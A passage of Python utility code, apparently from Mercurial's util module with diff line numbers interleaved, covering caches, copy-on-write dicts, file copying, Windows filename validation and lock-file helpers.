    >>> versiontuple(v, 4)
    (3, 9, None, 'rc')

    >>> v = b'3.9-rc+2-02a8fea4289b'
    >>> versiontuple(v, 2)
    (3, 9)
    >>> versiontuple(v, 3)
    (3, 9, None)
    >>> versiontuple(v, 4)
    (3, 9, None, 'rc+2-02a8fea4289b')

    >>> versiontuple(b'4.6rc0')
    (4, 6, None, 'rc0')
    >>> versiontuple(b'4.6rc0+12-425d55e54f98')
    (4, 6, None, 'rc0+12-425d55e54f98')
    >>> versiontuple(b'.1.2.3')
    (None, None, None, '.1.2.3')
    >>> versiontuple(b'12.34..5')
    (12, 34, None, '..5')
    >>> versiontuple(b'1.2.3.4.5.6')
    (1, 2, 3, '.4.5.6')
    """
    if not v:
        v = version()
    # Up to three dotted numeric components, optionally followed by a
    # '+'/'-' separated suffix (rc tags, local build info, ...).
    m = remod.match(br'(\d+(?:\.\d+){,2})[+-]?(.*)', v)
    if not m:
        vparts, extra = b'', v
    elif m.group(2):
        vparts, extra = m.groups()
    else:
        vparts, extra = m.group(1), None

    assert vparts is not None  # help pytype

    vints = []
    for part in vparts.split(b'.'):
        if not part.isdigit():
            break
        vints.append(int(part))
    # Pad to three components, e.g. (3, 6) -> (3, 6, None).
    vints += [None] * (3 - len(vints))

    if n == 2:
        return tuple(vints[:2])
    if n == 3:
        return tuple(vints[:3])
    if n == 4:
        return (vints[0], vints[1], vints[2], extra)
1225 1225
1226 1226
def cachefunc(func):
    '''cache the result of function calls'''
    # XXX doesn't handle keywords args
    argcount = func.__code__.co_argcount
    if argcount == 0:
        # Zero-argument functions only ever have one result to remember.
        listcache = []

        def f():
            if not listcache:
                listcache.append(func())
            return listcache[0]

        return f

    cache = {}
    if argcount == 1:
        # Single-argument fast path: key directly on the argument instead
        # of packing/unpacking a tuple.
        def f(arg):
            try:
                return cache[arg]
            except KeyError:
                cache[arg] = func(arg)
                return cache[arg]

    else:

        def f(*args):
            try:
                return cache[args]
            except KeyError:
                cache[args] = func(*args)
                return cache[args]

    return f
1256 1256
1257 1257
class cow(object):
    """Mixin making copy-on-write easier.

    ``copy()`` is always cheap (it only bumps a share counter); call
    ``preparewrite()`` before mutating to obtain an object that is safe
    to write to.
    """

    def preparewrite(self):
        """call this before writes, return self or a copied new object"""
        shared = getattr(self, '_copied', 0)
        if not shared:
            return self
        # Someone else holds a reference: hand them back a real copy.
        self._copied = shared - 1
        return self.__class__(self)

    def copy(self):
        """always do a cheap copy"""
        self._copied = getattr(self, '_copied', 0) + 1
        return self
1275 1275
1276 1276
class sortdict(collections.OrderedDict):
    """a simple sorted dictionary

    Keys keep last-set order: re-assigning an existing key moves it to
    the end.

    >>> d1 = sortdict([(b'a', 0), (b'b', 1)])
    >>> d2 = d1.copy()
    >>> d2
    sortdict([('a', 0), ('b', 1)])
    >>> d2.update([(b'a', 2)])
    >>> list(d2.keys()) # should still be in last-set order
    ['b', 'a']
    >>> d1.insert(1, b'a.5', 0.5)
    >>> d1
    sortdict([('a', 0), ('a.5', 0.5), ('b', 1)])
    """

    def __setitem__(self, key, value):
        # Drop any existing entry first so the key moves to the end.
        if key in self:
            del self[key]
        super(sortdict, self).__setitem__(key, value)

    if pycompat.ispypy:
        # __setitem__() isn't called as of PyPy 5.8.0
        # Accept keyword arguments too, matching dict.update()'s signature
        # (the diff residue duplicating the old one-argument definition has
        # been removed).
        def update(self, src, **f):
            if isinstance(src, dict):
                src = pycompat.iteritems(src)
            for k, v in src:
                self[k] = v
            for k in f:
                self[k] = f[k]

    def insert(self, position, key, value):
        """Insert ``key: value`` at index ``position``.

        Re-adds every item at or after ``position`` so ordering is
        preserved around the new entry.
        """
        for (i, (k, v)) in enumerate(list(self.items())):
            if i == position:
                self[key] = value
            if i >= position:
                del self[k]
                self[k] = v
1312 1314
1313 1315
class cowdict(cow, dict):
    """copy-on-write dict

    Be sure to call d = d.preparewrite() before writing to d.
    Until then, copies returned by copy() share this same underlying dict.

    >>> a = cowdict()
    >>> a is a.preparewrite()
    True
    >>> b = a.copy()
    >>> b is a
    True
    >>> c = b.copy()
    >>> c is a
    True
    >>> a = a.preparewrite()
    >>> b is a
    False
    >>> a is a.preparewrite()
    True
    >>> c = c.preparewrite()
    >>> b is c
    False
    >>> b is b.preparewrite()
    True
    """
1339 1341
1340 1342
class cowsortdict(cow, sortdict):
    """copy-on-write sortdict

    Be sure to call d = d.preparewrite() before writing to d.
    Until then, copies returned by copy() share the same underlying dict.
    """
1346 1348
1347 1349
class transactional(object):  # pytype: disable=ignored-metaclass
    """Base class for making a transactional type into a context manager."""

    # py2-style metaclass assignment (see the pytype disable above).
    __metaclass__ = abc.ABCMeta

    @abc.abstractmethod
    def close(self):
        """Successfully closes the transaction."""

    @abc.abstractmethod
    def release(self):
        """Marks the end of the transaction.

        If the transaction has not been closed, it will be aborted.
        """

    def __enter__(self):
        return self

    def __exit__(self, exc_type, exc_val, exc_tb):
        # Close only on a clean exit; release unconditionally so an
        # unclosed transaction is aborted even if close() raises.
        try:
            if exc_type is None:
                self.close()
        finally:
            self.release()
1373 1375
1374 1376
@contextlib.contextmanager
def acceptintervention(tr=None):
    """A context manager that closes the transaction on InterventionRequired

    If no transaction was provided, this simply runs the body and returns
    """
    if not tr:
        yield
        return
    try:
        yield
        tr.close()
    except error.InterventionRequired:
        # InterventionRequired is an "expected" stop: commit what was done
        # so far, then let the exception propagate to the caller.
        tr.close()
        raise
    finally:
        # Always release; this aborts the transaction if close() never ran.
        tr.release()
1392 1394
1393 1395
@contextlib.contextmanager
def nullcontextmanager(enter_result=None):
    """A no-op context manager that simply yields ``enter_result``."""
    yield enter_result
1397 1399
1398 1400
class _lrucachenode(object):
    """A node in a doubly linked list.

    Holds a reference to nodes on either side as well as a key-value
    pair for the dictionary entry.
    """

    __slots__ = ('next', 'prev', 'key', 'value', 'cost')

    def __init__(self):
        self.next = None
        self.prev = None
        # A fresh node starts out empty; markempty() installs the
        # sentinel key and zeroed value/cost.
        self.markempty()

    def markempty(self):
        """Mark the node as emptied."""
        self.key = _notset
        self.value = None
        self.cost = 0
1421 1423
1422 1424
class lrucachedict(object):
    """Dict that caches most recent accesses and sets.

    The dict consists of an actual backing dict - indexed by original
    key - and a doubly linked circular list defining the order of entries in
    the cache.

    The head node is the newest entry in the cache. If the cache is full,
    we recycle head.prev and make it the new head. Cache accesses result in
    the node being moved to before the existing head and being marked as the
    new head node.

    Items in the cache can be inserted with an optional "cost" value. This is
    simply an integer that is specified by the caller. The cache can be queried
    for the total cost of all items presently in the cache.

    The cache can also define a maximum cost. If a cache insertion would
    cause the total cost of the cache to go beyond the maximum cost limit,
    nodes will be evicted to make room for the new node. This can be used
    to e.g. set a max memory limit and associate an estimated bytes size
    cost to each item in the cache. By default, no maximum cost is enforced.
    """

    def __init__(self, max, maxcost=0):
        # key -> _lrucachenode mapping; recency is tracked by the circular
        # linked list rooted at self._head (head == newest entry).
        self._cache = {}

        self._head = head = _lrucachenode()
        head.prev = head
        head.next = head
        self._size = 1
        self.capacity = max
        self.totalcost = 0
        self.maxcost = maxcost

    def __len__(self):
        return len(self._cache)

    def __contains__(self, k):
        return k in self._cache

    def __iter__(self):
        # We don't have to iterate in cache order, but why not.
        n = self._head
        for i in range(len(self._cache)):
            yield n.key
            n = n.next

    def __getitem__(self, k):
        # Accessing an item promotes it to most-recently-used.
        node = self._cache[k]
        self._movetohead(node)
        return node.value

    def insert(self, k, v, cost=0):
        """Insert a new item in the cache with optional cost value."""
        node = self._cache.get(k)
        # Replace existing value and mark as newest.
        if node is not None:
            self.totalcost -= node.cost
            node.value = v
            node.cost = cost
            self.totalcost += cost
            self._movetohead(node)

            if self.maxcost:
                self._enforcecostlimit()

            return

        if self._size < self.capacity:
            node = self._addcapacity()
        else:
            # Grab the last/oldest item.
            node = self._head.prev

            # At capacity. Kill the old entry.
            if node.key is not _notset:
                self.totalcost -= node.cost
                del self._cache[node.key]

        node.key = k
        node.value = v
        node.cost = cost
        self.totalcost += cost
        self._cache[k] = node
        # And mark it as newest entry. No need to adjust order since it
        # is already self._head.prev.
        self._head = node

        if self.maxcost:
            self._enforcecostlimit()

    def __setitem__(self, k, v):
        self.insert(k, v)

    def __delitem__(self, k):
        self.pop(k)

    def pop(self, k, default=_notset):
        # _notset doubles as "no default given" sentinel here.
        try:
            node = self._cache.pop(k)
        except KeyError:
            if default is _notset:
                raise
            return default

        assert node is not None  # help pytype
        value = node.value
        self.totalcost -= node.cost
        node.markempty()

        # Temporarily mark as newest item before re-adjusting head to make
        # this node the oldest item.
        self._movetohead(node)
        self._head = node.next

        return value

    # Additional dict methods.

    def get(self, k, default=None):
        try:
            return self.__getitem__(k)
        except KeyError:
            return default

    def peek(self, k, default=_notset):
        """Get the specified item without moving it to the head

        Unlike get(), this doesn't mutate the internal state. But be aware
        that it doesn't mean peek() is thread safe.
        """
        try:
            node = self._cache[k]
            return node.value
        except KeyError:
            if default is _notset:
                raise
            return default

    def clear(self):
        # Walk the ring once, emptying every occupied node in place.
        n = self._head
        while n.key is not _notset:
            self.totalcost -= n.cost
            n.markempty()
            n = n.next

        self._cache.clear()

    def copy(self, capacity=None, maxcost=0):
        """Create a new cache as a copy of the current one.

        By default, the new cache has the same capacity as the existing one.
        But, the cache capacity can be changed as part of performing the
        copy.

        Items in the copy have an insertion/access order matching this
        instance.
        """

        capacity = capacity or self.capacity
        maxcost = maxcost or self.maxcost
        result = lrucachedict(capacity, maxcost=maxcost)

        # We copy entries by iterating in oldest-to-newest order so the copy
        # has the correct ordering.

        # Find the first non-empty entry.
        n = self._head.prev
        while n.key is _notset and n is not self._head:
            n = n.prev

        # We could potentially skip the first N items when decreasing capacity.
        # But let's keep it simple unless it is a performance problem.
        for i in range(len(self._cache)):
            result.insert(n.key, n.value, cost=n.cost)
            n = n.prev

        return result

    def popoldest(self):
        """Remove the oldest item from the cache.

        Returns the (key, value) describing the removed cache entry.
        """
        if not self._cache:
            return

        # Walk the linked list backwards starting at tail node until we hit
        # a non-empty node.
        n = self._head.prev
        while n.key is _notset:
            n = n.prev

        assert n is not None  # help pytype

        key, value = n.key, n.value

        # And remove it from the cache and mark it as empty.
        del self._cache[n.key]
        self.totalcost -= n.cost
        n.markempty()

        return key, value

    def _movetohead(self, node):
        """Mark a node as the newest, making it the new head.

        When a node is accessed, it becomes the freshest entry in the LRU
        list, which is denoted by self._head.

        Visually, let's make ``N`` the new head node (* denotes head):

            previous/oldest <-> head <-> next/next newest

            ----<->--- A* ---<->-----
            |                       |
            E <-> D <-> N <-> C <-> B

        To:

            ----<->--- N* ---<->-----
            |                       |
            E <-> D <-> C <-> B <-> A

        This requires the following moves:

           C.next = D  (node.prev.next = node.next)
           D.prev = C  (node.next.prev = node.prev)
           E.next = N  (head.prev.next = node)
           N.prev = E  (node.prev = head.prev)
           N.next = A  (node.next = head)
           A.prev = N  (head.prev = node)
        """
        head = self._head
        # C.next = D
        node.prev.next = node.next
        # D.prev = C
        node.next.prev = node.prev
        # N.prev = E
        node.prev = head.prev
        # N.next = A
        # It is tempting to do just "head" here, however if node is
        # adjacent to head, this will do bad things.
        node.next = head.prev.next
        # E.next = N
        node.next.prev = node
        # A.prev = N
        node.prev.next = node

        self._head = node

    def _addcapacity(self):
        """Add a node to the circular linked list.

        The new node is inserted before the head node.
        """
        head = self._head
        node = _lrucachenode()
        head.prev.next = node
        node.prev = head.prev
        node.next = head
        head.prev = node
        self._size += 1
        return node

    def _enforcecostlimit(self):
        # This should run after an insertion. It should only be called if total
        # cost limits are being enforced.
        # The most recently inserted node is never evicted.
        if len(self) <= 1 or self.totalcost <= self.maxcost:
            return

        # This is logically equivalent to calling popoldest() until we
        # free up enough cost. We don't do that since popoldest() needs
        # to walk the linked list and doing this in a loop would be
        # quadratic. So we find the first non-empty node and then
        # walk nodes until we free up enough capacity.
        #
        # If we only removed the minimum number of nodes to free enough
        # cost at insert time, chances are high that the next insert would
        # also require pruning. This would effectively constitute quadratic
        # behavior for insert-heavy workloads. To mitigate this, we set a
        # target cost that is a percentage of the max cost. This will tend
        # to free more nodes when the high water mark is reached, which
        # lowers the chances of needing to prune on the subsequent insert.
        targetcost = int(self.maxcost * 0.75)

        n = self._head.prev
        while n.key is _notset:
            n = n.prev

        while len(self) > 1 and self.totalcost > targetcost:
            del self._cache[n.key]
            self.totalcost -= n.cost
            n.markempty()
            n = n.prev
1719 1721
1720 1722
def lrucachefunc(func):
    '''cache most recent results of function calls'''
    cache = {}
    order = collections.deque()

    def _lookup(key, compute):
        # On a hit, refresh recency; on a miss, evict the least recently
        # used entry once the cache holds more than 20 items, then store
        # the newly computed value.
        if key in cache:
            order.remove(key)
        else:
            if len(cache) > 20:
                del cache[order.popleft()]
            cache[key] = compute()
        order.append(key)
        return cache[key]

    if func.__code__.co_argcount == 1:

        def f(arg):
            return _lookup(arg, lambda: func(arg))

    else:

        def f(*args):
            return _lookup(args, lambda: func(*args))

    return f
1750 1752
1751 1753
class propertycache(object):
    """Decorator turning a method into a lazily computed attribute.

    The first access computes the value and stores it in the instance's
    ``__dict__`` under the same name; being a non-data descriptor, later
    accesses then bypass this descriptor entirely.
    """

    def __init__(self, func):
        self.func = func
        self.name = func.__name__

    def __get__(self, obj, type=None):
        value = self.func(obj)
        self.cachevalue(obj, value)
        return value

    def cachevalue(self, obj, value):
        # __dict__ assignment required to bypass __setattr__ (eg: repoview)
        obj.__dict__[self.name] = value
1765 1767
1766 1768
def clearcachedproperty(obj, prop):
    '''clear a cached property value, if one has been set'''
    prop = pycompat.sysstr(prop)
    # pop() tolerates the value never having been computed.
    obj.__dict__.pop(prop, None)
1772 1774
1773 1775
def increasingchunks(source, min=1024, max=65536):
    """return no less than min bytes per chunk while data remains,
    doubling min after each chunk until it reaches max"""

    def log2(x):
        # floor(log2(x)); defined as 0 for x == 0
        if not x:
            return 0
        return x.bit_length() - 1

    buf = []
    blen = 0
    for chunk in source:
        buf.append(chunk)
        blen += len(chunk)
        if blen < min:
            continue
        if min < max:
            # Double the threshold, or jump to the largest power of two
            # not exceeding the bytes just gathered if that is bigger,
            # capping at max.
            min = min << 1
            nmin = 1 << log2(blen)
            if nmin > min:
                min = nmin
            if min > max:
                min = max
        yield b''.join(buf)
        blen = 0
        buf = []
    if buf:
        # Flush whatever remains, even if below the current threshold.
        yield b''.join(buf)
1805 1807
1806 1808
def always(fn):
    """Predicate that accepts anything (ignores its argument)."""
    return True


def never(fn):
    """Predicate that accepts nothing (ignores its argument)."""
    return False
1813 1815
1814 1816
def nogc(func):
    """disable garbage collector

    Python's garbage collector triggers a GC each time a certain number of
    container objects (the number being defined by gc.get_threshold()) are
    allocated even when marked not to be tracked by the collector. Tracking
    has no effect on when GCs are triggered, only on what objects the GC
    looks into. As a workaround, disable GC while building complex (huge)
    containers.

    This garbage collector issue has been fixed in 2.7. But it still
    affects CPython's performance.
    """

    def wrapper(*args, **kwargs):
        wasenabled = gc.isenabled()
        gc.disable()
        try:
            return func(*args, **kwargs)
        finally:
            # Only re-enable collection if the caller had it on originally.
            if wasenabled:
                gc.enable()

    return wrapper
1839 1841
1840 1842
if pycompat.ispypy:
    # PyPy runs slower with gc disabled
    nogc = lambda x: x
1844 1846
1845 1847
def pathto(root, n1, n2):
    # type: (bytes, bytes, bytes) -> bytes
    """return the relative path from one place to another.
    root should use os.sep to separate directories
    n1 should use os.sep to separate directories
    n2 should use "/" to separate directories
    returns an os.sep-separated path.

    If n1 is a relative path, it's assumed it's
    relative to root.
    n2 should always be relative to root.
    """
    if not n1:
        return localpath(n2)
    if os.path.isabs(n1):
        if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
            # Different drives: no relative path exists; anchor at root.
            return os.path.join(root, localpath(n2))
        n2 = b'/'.join((pconvert(root), n2))
    fromparts = splitpath(n1)
    toparts = n2.split(b'/')
    # Strip the longest common run of leading components.
    common = 0
    while (
        common < len(fromparts)
        and common < len(toparts)
        and fromparts[common] == toparts[common]
    ):
        common += 1
    # Climb out of what remains of n1, then descend into n2.
    up = [b'..'] * (len(fromparts) - common)
    return pycompat.ossep.join(up + toparts[common:]) or b'.'
1872 1874
1873 1875
def checksignature(func, depth=1):
    '''wrap a function with code to check for calling errors'''

    def check(*args, **kwargs):
        try:
            return func(*args, **kwargs)
        except TypeError:
            # A traceback of exactly `depth` frames means the TypeError
            # came from the call itself (bad arguments), not from inside
            # the called function.
            tb = sys.exc_info()[2]
            if len(traceback.extract_tb(tb)) == depth:
                raise error.SignatureError
            raise

    return check
1886 1888
1887 1889
# a whitelist of known filesystems where hardlink works reliably
_hardlinkfswhitelist = {
    b'apfs',
    b'btrfs',
    b'ext2',
    b'ext3',
    b'ext4',
    b'hfs',
    b'jfs',
    b'NTFS',
    b'reiserfs',
    b'tmpfs',
    b'ufs',
    b'xfs',
    b'zfs',
}
1904 1906
1905 1907
def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
    """copy a file, preserving mode and optionally other stat info like
    atime/mtime

    checkambig argument is used with filestat, and is useful only if
    destination file is guarded by any lock (e.g. repo.lock or
    repo.wlock).

    copystat and checkambig should be exclusive.
    """
    assert not (copystat and checkambig)
    oldstat = None
    if os.path.lexists(dest):
        # Remember the destination's stat (for ambiguity detection) before
        # removing it.
        if checkambig:
            oldstat = checkambig and filestat.frompath(dest)
        unlink(dest)
    if hardlink:
        # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
        # unless we are confident that dest is on a whitelisted filesystem.
        try:
            fstype = getfstype(os.path.dirname(dest))
        except OSError:
            fstype = None
        if fstype not in _hardlinkfswhitelist:
            hardlink = False
    if hardlink:
        try:
            oslink(src, dest)
            return
        except (IOError, OSError):
            pass  # fall back to normal copy
    if os.path.islink(src):
        os.symlink(os.readlink(src), dest)
        # copytime is ignored for symlinks, but in general copytime isn't needed
        # for them anyway
    else:
        try:
            shutil.copyfile(src, dest)
            if copystat:
                # copystat also copies mode
                shutil.copystat(src, dest)
            else:
                shutil.copymode(src, dest)
                if oldstat and oldstat.stat:
                    newstat = filestat.frompath(dest)
                    if newstat.isambig(oldstat):
                        # stat of copied file is ambiguous to original one
                        # advance mtime by one second (masked to 31 bits) to
                        # disambiguate
                        advanced = (
                            oldstat.stat[stat.ST_MTIME] + 1
                        ) & 0x7FFFFFFF
                        os.utime(dest, (advanced, advanced))
        except shutil.Error as inst:
            raise error.Abort(stringutil.forcebytestr(inst))
1959 1961
1960 1962
def copyfiles(src, dst, hardlink=None, progress=None):
    """Copy a directory tree using hardlinks if possible.

    When ``hardlink`` is None it is decided automatically: hardlinks are
    attempted only when src and dst live on the same device.  Returns a
    ``(hardlink, count)`` tuple so recursive calls can propagate whether
    hardlinking is still viable.
    """
    num = 0

    def settopic():
        if progress:
            progress.topic = _(b'linking') if hardlink else _(b'copying')

    if os.path.isdir(src):
        if hardlink is None:
            # Same device as the destination's parent => hardlinks possible.
            hardlink = (
                os.stat(src).st_dev == os.stat(os.path.dirname(dst)).st_dev
            )
        settopic()
        os.mkdir(dst)
        for name, kind in listdir(src):
            srcname = os.path.join(src, name)
            dstname = os.path.join(dst, name)
            hardlink, n = copyfiles(srcname, dstname, hardlink, progress)
            num += n
    else:
        if hardlink is None:
            hardlink = (
                os.stat(os.path.dirname(src)).st_dev
                == os.stat(os.path.dirname(dst)).st_dev
            )
        settopic()

        if hardlink:
            try:
                oslink(src, dst)
            except (IOError, OSError):
                # Once a hardlink fails, stop trying for the rest of the tree.
                hardlink = False
                shutil.copy(src, dst)
        else:
            shutil.copy(src, dst)
        num += 1
        if progress:
            progress.increment()

    return hardlink, num
2002 2004
2003 2005
# Reserved device names on Windows; a path component may not use one of
# these as its base name (the part before the first '.').
_winreservednames = {
    b'con',
    b'prn',
    b'aux',
    b'nul',
    b'com1',
    b'com2',
    b'com3',
    b'com4',
    b'com5',
    b'com6',
    b'com7',
    b'com8',
    b'com9',
    b'lpt1',
    b'lpt2',
    b'lpt3',
    b'lpt4',
    b'lpt5',
    b'lpt6',
    b'lpt7',
    b'lpt8',
    b'lpt9',
}
# Characters that may not appear anywhere in a Windows filename.
_winreservedchars = b':*?"<>|'
2029 2031
2030 2032
def checkwinfilename(path):
    # type: (bytes) -> Optional[bytes]
    r"""Check that the base-relative path is a valid filename on Windows.
    Returns None if the path is ok, or a UI string describing the problem.

    >>> checkwinfilename(b"just/a/normal/path")
    >>> checkwinfilename(b"foo/bar/con.xml")
    "filename contains 'con', which is reserved on Windows"
    >>> checkwinfilename(b"foo/con.xml/bar")
    "filename contains 'con', which is reserved on Windows"
    >>> checkwinfilename(b"foo/bar/xml.con")
    >>> checkwinfilename(b"foo/bar/AUX/bla.txt")
    "filename contains 'AUX', which is reserved on Windows"
    >>> checkwinfilename(b"foo/bar/bla:.txt")
    "filename contains ':', which is reserved on Windows"
    >>> checkwinfilename(b"foo/bar/b\07la.txt")
    "filename contains '\\x07', which is invalid on Windows"
    >>> checkwinfilename(b"foo/bar/bla ")
    "filename ends with ' ', which is not allowed on Windows"
    >>> checkwinfilename(b"../bar")
    >>> checkwinfilename(b"foo\\")
    "filename ends with '\\', which is invalid on Windows"
    >>> checkwinfilename(b"foo\\/bar")
    "directory name ends with '\\', which is invalid on Windows"
    """
    if path.endswith(b'\\'):
        return _(b"filename ends with '\\', which is invalid on Windows")
    if b'\\/' in path:
        return _(b"directory name ends with '\\', which is invalid on Windows")
    # Validate each path component individually.
    for n in path.replace(b'\\', b'/').split(b'/'):
        if not n:
            continue
        for c in _filenamebytestr(n):
            if c in _winreservedchars:
                return (
                    _(
                        b"filename contains '%s', which is reserved "
                        b"on Windows"
                    )
                    % c
                )
            if ord(c) <= 31:
                return _(
                    b"filename contains '%s', which is invalid on Windows"
                ) % stringutil.escapestr(c)
        # The base name (before the first '.') must not be a reserved
        # device name, case-insensitively.
        base = n.split(b'.')[0]
        if base and base.lower() in _winreservednames:
            return (
                _(b"filename contains '%s', which is reserved on Windows")
                % base
            )
        # Trailing dot or space is rejected, but the special components
        # '.' and '..' are allowed.
        t = n[-1:]
        if t in b'. ' and n not in b'..':
            return (
                _(
                    b"filename ends with '%s', which is not allowed "
                    b"on Windows"
                )
                % t
            )
2091 2093
2092 2094
# Best available high-resolution clock; perf_counter exists on Python 3.
timer = getattr(time, "perf_counter", None)

if pycompat.iswindows:
    checkosfilename = checkwinfilename
    if not timer:
        timer = time.clock  # Python 2 fallback on Windows
else:
    # mercurial.windows doesn't have platform.checkosfilename
    checkosfilename = platform.checkosfilename  # pytype: disable=module-attr
    if not timer:
        timer = time.time  # Python 2 fallback elsewhere
2104 2106
2105 2107
def makelock(info, pathname):
    """Create a lock file atomically if possible

    This may leave a stale lock file if symlink isn't supported and signal
    interrupt is enabled.
    """
    # A symlink is preferred: creating it is atomic and the lock info is
    # stored directly in the link target.
    try:
        return os.symlink(info, pathname)
    except OSError as why:
        # Propagate "already locked"; any other symlink failure falls
        # back to the plain-file path below.
        if why.errno == errno.EEXIST:
            raise
    except AttributeError:  # no symlink in os
        pass

    # Fallback: exclusively create a regular file holding the lock info.
    mode = os.O_CREAT | os.O_WRONLY | os.O_EXCL | getattr(os, 'O_BINARY', 0)
    fd = os.open(pathname, mode)
    os.write(fd, info)
    os.close(fd)
2124 2126
2125 2127
def readlock(pathname):
    # type: (bytes) -> bytes
    """Return the info stored in the lock file at ``pathname``.

    The lock is normally a symlink whose target carries the info (see
    makelock()); fall back to reading a regular file when the path is
    not a symlink or symlinks are unsupported.
    """
    try:
        return readlink(pathname)
    except OSError as why:
        # EINVAL: not a symlink; ENOSYS: symlinks unsupported --
        # either way, try the plain-file fallback below.
        if why.errno not in (errno.EINVAL, errno.ENOSYS):
            raise
    except AttributeError:  # no symlink in os
        pass
    with posixfile(pathname, b'rb') as fp:
        return fp.read()
2137 2139
2138 2140
def fstat(fp):
    '''stat file object that may not have fileno method.'''
    fileno = getattr(fp, 'fileno', None)
    if fileno is not None:
        return os.fstat(fileno())
    # no file descriptor available; stat by name instead
    return os.stat(fp.name)
2145 2147
2146 2148
2147 2149 # File system features
2148 2150
2149 2151
def fscasesensitive(path):
    # type: (bytes) -> bool
    """
    Return true if the given path is on a case-sensitive filesystem

    Requires a path (like /foo/.hg) ending with a foldable final
    directory component.
    """
    st = os.lstat(path)
    dirname, base = os.path.split(path)
    folded = base.upper()
    if folded == base:
        folded = base.lower()
    if folded == base:
        # nothing in the name folds, so there is no evidence against
        # case sensitivity
        return True
    try:
        other = os.lstat(os.path.join(dirname, folded))
    except OSError:
        # the case-swapped name doesn't resolve at all
        return True
    # identical stat results mean both spellings hit the same file
    return other != st
2173 2175
2174 2176
try:
    import re2  # pytype: disable=import-error

    # None means "availability not yet probed"; _re._checkre2() below
    # resolves it to True/False on first use.
    _re2 = None
except ImportError:
    _re2 = False
2181 2183
2182 2184
class _re(object):
    """Facade over the stdlib ``re`` module that transparently uses the
    ``re2`` binding when it is importable and the pattern/flags allow it.
    """

    def _checkre2(self):
        # Probe once whether the imported re2 binding actually works and
        # cache the verdict in the module-level _re2 flag.
        global _re2
        try:
            # check if match works, see issue3964
            _re2 = bool(re2.match(br'\[([^\[]+)\]', b'[ui]'))
        except ImportError:
            _re2 = False

    def compile(self, pat, flags=0):
        """Compile a regular expression, using re2 if possible

        For best performance, use only re2-compatible regexp features. The
        only flags from the re module that are re2-compatible are
        IGNORECASE and MULTILINE."""
        if _re2 is None:
            self._checkre2()
        if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
            # re2 takes flags as inline pattern syntax, not as an argument
            if flags & remod.IGNORECASE:
                pat = b'(?i)' + pat
            if flags & remod.MULTILINE:
                pat = b'(?m)' + pat
            try:
                return re2.compile(pat)
            except re2.error:
                # pattern uses a feature re2 doesn't support; fall back
                pass
        return remod.compile(pat, flags)

    @propertycache
    def escape(self):
        """Return the version of escape corresponding to self.compile.

        This is imperfect because whether re2 or re is used for a particular
        function depends on the flags, etc, but it's the best we can do.
        """
        global _re2
        if _re2 is None:
            self._checkre2()
        if _re2:
            return re2.escape
        else:
            return remod.escape
2225 2227
2226 2228
# Instance used in place of the stdlib re module by this file's users.
re = _re()

# Cache of {directory: {normcased name: on-disk name}} used by fspath().
_fspathcache = {}
2230 2232
2231 2233
def fspath(name, root):
    # type: (bytes, bytes) -> bytes
    """Get name in the case stored in the filesystem

    The name should be relative to root, and be normcase-ed for efficiency.

    Note that this function is unnecessary, and should not be
    called, for case-sensitive filesystems (simply because it's expensive).

    The root should be normcase-ed, too.
    """

    def _makefspathcacheentry(dir):
        # map normcased entry -> actual on-disk spelling
        return {normcase(n): n for n in os.listdir(dir)}

    seps = pycompat.ossep
    if pycompat.osaltsep:
        seps = seps + pycompat.osaltsep
    # Protect backslashes. This gets silly very quickly.
    # bytes.replace() returns a new object, so the result must be
    # reassigned for the escaping to take effect inside the regex
    # character classes below.
    seps = seps.replace(b'\\', b'\\\\')
    pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
    dir = os.path.normpath(root)
    result = []
    for part, sep in pattern.findall(name):
        if sep:
            # separator runs pass through unchanged
            result.append(sep)
            continue

        if dir not in _fspathcache:
            _fspathcache[dir] = _makefspathcacheentry(dir)
        contents = _fspathcache[dir]

        found = contents.get(part)
        if not found:
            # retry "once per directory" per "dirstate.walk" which
            # may take place for each patches of "hg qpush", for example
            _fspathcache[dir] = contents = _makefspathcacheentry(dir)
            found = contents.get(part)

        result.append(found or part)
        dir = os.path.join(dir, part)

    return b''.join(result)
2275 2277
2276 2278
def checknlink(testfile):
    # type: (bytes) -> bool
    '''check whether hardlink count reporting works properly'''

    # testfile may be open, so we need a separate file for checking to
    # work around issue2543 (or testfile may get lost on Samba shares)
    f1, f2, fp = None, None, None
    try:
        # create a sibling temp file next to testfile and hardlink it
        fd, f1 = pycompat.mkstemp(
            prefix=b'.%s-' % os.path.basename(testfile),
            suffix=b'1~',
            dir=os.path.dirname(testfile),
        )
        os.close(fd)
        f2 = b'%s2~' % f1[:-2]

        oslink(f1, f2)
        # nlinks() may behave differently for files on Windows shares if
        # the file is open.
        fp = posixfile(f2)
        return nlinks(f2) > 1
    except OSError:
        # any failure (no hardlink support, permissions, ...) counts as
        # "hardlink counting does not work here"
        return False
    finally:
        if fp is not None:
            fp.close()
        for f in (f1, f2):
            try:
                if f is not None:
                    os.unlink(f)
            except OSError:
                pass
2309 2311
2310 2312
def endswithsep(path):
    # type: (bytes) -> bool
    '''Check path ends with os.sep or os.altsep.'''
    if path.endswith(pycompat.ossep):
        return True
    alt = pycompat.osaltsep
    return bool(alt and path.endswith(alt))
2319 2321
2320 2322
def splitpath(path):
    # type: (bytes) -> List[bytes]
    """Split path by os.sep.
    Note that this function does not use os.altsep because this is
    an alternative of simple "xxx.split(os.sep)".
    It is recommended to use os.path.normpath() before using this
    function if need."""
    separator = pycompat.ossep
    return path.split(separator)
2329 2331
2330 2332
def mktempcopy(name, emptyok=False, createmode=None, enforcewritable=False):
    """Create a temporary file with the same contents from name

    The permission bits are copied from the original file.

    If the temporary file is going to be truncated immediately, you
    can use emptyok=True as an optimization.

    Returns the name of the temporary file.
    """
    d, fn = os.path.split(name)
    fd, temp = pycompat.mkstemp(prefix=b'.%s-' % fn, suffix=b'~', dir=d)
    os.close(fd)
    # Temporary files are created with mode 0600, which is usually not
    # what we want. If the original file already exists, just copy
    # its mode. Otherwise, manually obey umask.
    copymode(name, temp, createmode, enforcewritable)

    if emptyok:
        return temp
    try:
        try:
            ifp = posixfile(name, b"rb")
        except IOError as inst:
            if inst.errno == errno.ENOENT:
                # original doesn't exist; the empty temp file is the copy
                return temp
            if not getattr(inst, 'filename', None):
                inst.filename = name
            raise
        ofp = posixfile(temp, b"wb")
        for chunk in filechunkiter(ifp):
            ofp.write(chunk)
